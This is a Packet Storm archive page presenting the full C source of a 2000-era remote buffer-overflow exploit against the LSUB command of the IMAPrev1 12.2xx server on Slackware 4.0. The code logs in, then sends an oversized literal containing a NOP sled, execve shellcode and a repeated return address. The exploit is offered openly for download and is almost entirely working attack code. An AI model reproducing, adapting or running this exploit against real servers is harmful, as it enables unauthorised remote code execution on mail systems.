what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

12250.c

12250.c
Posted Sep 28, 2000
Authored by Delorean

IMAPrev1 12.2xx exploit (lsub bug). Slackware 4.0 remote overflow.

tags | exploit, remote, overflow
systems | linux, slackware
SHA-256 | a840f6b4a1f6f8925d0503bb5b5f670d7c5af5465aa574892d4e1771507ffe24

12250.c

Change Mirror Download
/* IMAPrev1 12.2xx exploit ( lsub bug )
* del0rean@s0ftpj.org
* solo per la mafietta ! */

/* v 12.250 - slackware 4.0 esp = 0xbffff890 offset = 1000 */
/* please add! */

#include <stdio.h>
#include <string.h>

#define LENGTH 1064

char shellcode[] = /* dunno where i grabbed thiz :) */
"\xeb\x35\x5e\x80\x46\x01\x30\x80\x46\x02\x30\x80\x46\x03\x30"
"\x80\x46\x05\x30\x80\x46\x06\x30\x89\xf0\x89\x46\x08\x31\xc0"
"\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56"
"\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xc6\xff\xff\xff"
"\x2f\x32\x39\x3e\x2f\x43\x38";

void usage()
{
printf("IMAPrev1 v 12.2xx exploit\n");
printf("Usage : ./explo user pass <offset>\n");
exit(0);
}

void main( int argc, char *argv[] )
{
int i, offset = 0;
char buf[LENGTH];
unsigned long esp = 0xbffff890; /* 12.250 - slackware 4.0 */

if(argc < 3) usage();
if(argc == 4) offset = atoi(argv[3]);
// fprintf(stderr,"0x%x\n", ge() );
memset(buf, 0x90, 1032);
memcpy(buf+613, shellcode, strlen(shellcode));
for(i = strlen(shellcode)+613; i <= LENGTH; i+=4)
*(long *)&buf[i] = (unsigned long) esp - offset;

printf("1 LOGIN %s %s\n", argv[1], argv[2]);
printf("1 LSUB \"\" {1064}\r\n");
for(i = 0; i < LENGTH; i++)
putchar(buf[i]);
printf("\r\n");
}
/* www.hack.co.za [25 September 2000]*/
Login or Register to add favorites

File Archive:

December 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    2 Files
  • 2
    Dec 2nd
    12 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    14 Files
  • 6
    Dec 6th
    18 Files
  • 7
    Dec 7th
    11 Files
  • 8
    Dec 8th
    36 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close